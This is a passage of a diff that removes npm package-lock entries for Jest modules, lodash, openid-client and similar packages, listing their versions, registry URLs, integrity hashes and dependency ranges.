"sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", - "optional": true, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsbn": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", - "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==" - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "node_modules/json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "node_modules/json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==", - "engines": { - "node": ">=12.0.0" - } - }, - "node_modules/jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "dependencies": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - }, - "engines": { - "node": ">=0.6.0" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "node_modules/lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/matcher": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/matcher/-/matcher-4.0.0.tgz", - "integrity": "sha512-S6x5wmcDmsDRRU/c2dkccDwQPXoFczc5+HpQ2lON8pnvHlnvHAHj5WlLVvw6n6vNyHuVugYrFohYxbS+pvFpKQ==", - "dependencies": { - "escape-string-regexp": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "dependencies": { - "mime-db": "1.52.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dependencies": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/minizlib/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/minizlib/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - }, - "node_modules/mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "bin": { - "mkdirp": "bin/cmd.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/mustache": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/mustache/-/mustache-4.2.0.tgz", - "integrity": "sha512-71ippSywq5Yb7/tVYyGbkBggbU8H3u5Rz56fH60jGFgr8uHwxs+aSKeqmluIVzM0m0kB7xQjKS6qPfd0b2ZoqQ==", - "bin": { - "mustache": "bin/mustache" - } - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-fetch": { - "version": "2.6.12", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.12.tgz", - "integrity": "sha512-C/fGU2E8ToujUivIO0H+tpQ6HWo4eEmchoPIoXtxCrVghxdKq+QOHqEZW7tuP3KlV3bC8FRMO5nMCC7Zm1VP6g==", - "dependencies": { - "whatwg-url": "^5.0.0" - }, - "engines": { - "node": "4.x || >=6.0.0" - }, - "peerDependencies": { - "encoding": "^0.1.0" - }, - "peerDependenciesMeta": { - "encoding": { - "optional": true - } - } - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "optional": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/oidc-token-hash": { - "version": "5.0.3", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.3.tgz", - "integrity": "sha512-IF4PcGgzAr6XXSff26Sk/+P4KZFJVuHAJZj3wgO3vX2bMdNVp/QXTP3P7CEm9V1IdG8lDLY3HhiqpsE/nOwpPw==", - "optional": true, - "engines": { - "node": "^10.13.0 || >=12.0.0" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "5.4.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.3.tgz", - "integrity": "sha512-sVQOvjsT/sbSfYsQI/9liWQGVZH/Pp3rrtlGEwgk/bbHfrUDZ24DN57lAagIwFtuEu+FM9Ev7r85s8S/yPjimQ==", - "optional": true, - "dependencies": { - "jose": "^4.14.4", - "lru-cache": "^6.0.0", - "object-hash": "^2.2.0", - "oidc-token-hash": "^5.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/openid-client/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "optional": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/openid-client/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": 